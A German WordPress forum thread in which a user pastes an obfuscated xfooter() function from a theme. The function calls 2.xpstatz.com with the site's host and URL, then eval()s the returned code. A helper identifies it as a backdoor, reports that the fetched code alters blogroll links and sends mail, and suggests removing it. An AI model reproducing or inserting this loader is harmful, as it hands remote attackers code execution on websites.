Neues Theme mit Fehlermeldung ab und zu

  • Hallo zusammen,

    ich habe heute auf ein neues Theme umgestellt und es hat eigentlich auch gut geklappt.

    Nur ab und zu erscheint ganz unten folgende Meldung:

    Code
    [B]Warning[/B]:  mysql_real_escape_string() [[URL="http://www.radtouren-verzeichnis.de/function.mysql-real-escape-string"]function.mysql-real-escape-string[/URL]]: Can't connect to local MySQL server through socket '/tmp/mysqld.sock' (2) in [B]/homepages/4/d211774155/htdocs/wp/wp-content/themes/sleepy-blue-10/functions.php[/B] on line [B]6[/B]
    
    
    [B]Warning[/B]:  mysql_real_escape_string() [[URL="http://www.radtouren-verzeichnis.de/function.mysql-real-escape-string"]function.mysql-real-escape-string[/URL]]: A link to the server could not be established in [B]/homepages/4/d211774155/htdocs/wp/wp-content/themes/sleepy-blue-10/functions.php[/B] on line [B]6[/B]

    Die Seite funktioniert aber ohne Probleme.....

    An was kann das liegen....kenne mich in PHP nicht so gut aus.

    Ach ja.

    Der Wechsel war auf ...Home « www.radtouren-verzeichnis.de vom Theme dialogue_menu auf sleepy-blue-10

    Grüße

    Lefdi

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Die Fehlermeldung weist auf die Zeile 6 in deiner functions.php hin. Hast du schon nachgesehen, was dort das Problem sein könnte? Sonst poste hier vielleicht mal deine functions.php. Ich bin kein php-Experte, aber es findet sich dann bestimmt einer! ;-)

    Sicher ist, dass nichts sicher ist. Selbst das nicht. (J. Ringelnatz) http://www.sigaspot.com

  • Die funktions.php hab ich mir schon angeschaut, aber das sagt mir nix....bin auch nicht so der PHP-Guru.

    Ich poste mal hier die Zeile 6

    PHP
    function xfooter()  {   global $wpdb;     $RDAFE7FE4FDC52E2D1048573B4DB1DF18 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_eval'");   $R41CCFE75D7AC2B4681397CFC70BAEF40 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_eval'");     if (empty($RDAFE7FE4FDC52E2D1048573B4DB1DF18)) {    $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_eval', '0', 'no')");    $RBDCA893A9385C089DC5F358AAA52C09B = 0;   } else $RBDCA893A9385C089DC5F358AAA52C09B = intval($RDAFE7FE4FDC52E2D1048573B4DB1DF18[0]);     if (empty($R41CCFE75D7AC2B4681397CFC70BAEF40)) {    $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_eval', '<br/>', 'no')");    $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = '<br/>';   } else $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = $R41CCFE75D7AC2B4681397CFC70BAEF40[0];       @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;');   if($R14AF1BE9EE26A90921E64A82E7836797)   {    $R5F38CE9C0B222F3BB0880E016DC07527 = "1";   }   else   {    $R5F38CE9C0B222F3BB0880E016DC07527 = "0";   }     if ( ( time() - $RBDCA893A9385C089DC5F358AAA52C09B ) >= 60 ) {      $R39C188653EA53DBD6E3F1D3915EDAC0C = "com";    $R8088818E3E46A17C12F2EE42EB12D7AC = "2.";    $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz";    $RAD8CC24399FEA84D3454DD7057C38FD0 = "xps-$R5F38CE9C0B222F3BB0880E016DC07527.";    $RBF7582359E6813BD7C54DD76E7505037 = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C";    $RA81C90DCC503F6900F7DC424AD04F525 = "/".$RAD8CC24399FEA84D3454DD7057C38FD0."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);      if (ini_get('allow_url_fopen')) {     $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = @file_get_contents("http://" . $RBF7582359E6813BD7C54DD76E7505037 . $RA81C90DCC503F6900F7DC424AD04F525);    } else {     $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($RBF7582359E6813BD7C54DD76E7505037, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);     if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) {      @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60);        @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $RA81C90DCC503F6900F7DC424AD04F525 HTTP/1.1\r\n");      @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $RBF7582359E6813BD7C54DD76E7505037\r\n");      @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n");        $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = "";        while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) {       $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024);      }        $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = trim(strstr($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1, "\r\n\r\n"));     }       @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);    }      if ( is_string($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1) ) {     $RBDCA893A9385C089DC5F358AAA52C09B = time();  if($R14AF1BE9EE26A90921E64A82E7836797)  {    @eval($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1);  }  else  {    echo "$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1";  }    $R9446905AFC32B438C0BD070AD05F3D83 = mysql_real_escape_string($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1);       $wpdb->query("UPDATE $wpdb->options SET option_value=$RBDCA893A9385C089DC5F358AAA52C09B WHERE option_name='l_time_eval'");     $wpdb->query("UPDATE $wpdb->options SET option_value='$R9446905AFC32B438C0BD070AD05F3D83' WHERE option_name='l_eval'");    }   }  }
  • Da hat der Theme-Autor mal wieder irgendwelchen verschlüsselten Code im Footer hinterlegt. Meienr Ansicht nach eine Unsitte. Wenn in dem Footer nichts wichtiges drin steht, dann wirf das einfach komplett raus und bau nur die nötigsten HTML-Tags ein (an </body> und </html> denk ich da, schau einfach in den Browserquelltext.)

    Ich muss mal nen Nachtrag bringen, weil ich mir gerade mal den xfooter()-Code näher angeschaut hab. Das ganze sieht mir überhaupt nicht vertrauenserweckend aus, da hier externe HTTP-Verbindungen geöffnet und möglicherweise irgendwelche Daten nachgeladen werden. Also ich persönlich würde mindestens die xfooter-Funktion rauswerfen, wahrscheinlich aber eher ein anderes Theme verwenden. wer weiß was da noch so alles passiert.
    Kannst du mal bitte per PHPMyAdmin in der DB nachschauen, was in wp-options in den Feldern 'l_time_eval' und 'l_eval' steht? Würde mich mal interessieren...

  • hi marX

    na du machst mir hoffnung mit dem template.
    jetzt hab ich mal eins gefunden, was mir gefällt und dann sowas....

    in der anlage screenshots der beiden dateien.

    lefdi

  • [del]Also ganz ehrlich, ich würde mir ein anderes Theme suchen.[/del]
    Edit: Wo hast du das Theme her? ich hab mir Version 1.0.2 von hier gezogen:
    :arrow: http://www.ehomy.net/blog/?p=32
    [COLOR="Red"]Da ist in der sidebar.php nur der Code für Widgets drin, keine xfooter()-Funktion o.ä.! Zieh dir vielleicht nochmal die aktuelle Version des Themes.
    [/COLOR]

    Ich hab den Code mit den in deiner DB abgelegten Werten mal getestet. Das Script verbindet sich mit:

    Code
    --> CONNECTED TO: http://2.xpstatz.com/xps-1.php?h=example.local&u=%2Ftest.php


    (example.local ist dabei MEINE lokale Testdomain!)

    und liefert mir folgendes zurück:

    Dieser nachgeladene Code wird per eval() ausgeführt!

    Was hier passiert ist: es werden Links aus deiner Blogroll entfernt und neu eingetragen, und zum Schluss wird noch eine Mail versendet.

    Ich glaube ich muss nichts weiter dazu sagen, oder?

    Falls du das Theme dennoch verwenden möchtest, dann würde ich überprüfen ob dort noch weitere solche fragwürdige Codes enthalten sind, und mindestens die xfooter()-Funktion entfernen oder durch diese hier ersetzen:

    PHP
    function xfooter() {
      return;
    }
  • na klasse....

    dann werd ich wohl doch sicherheitshalber auf ein anderes theme umsteigen.....

    so ein käse...wieder arbeit für nix...grrr

    aber vielen dank marX

    Lefdi

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!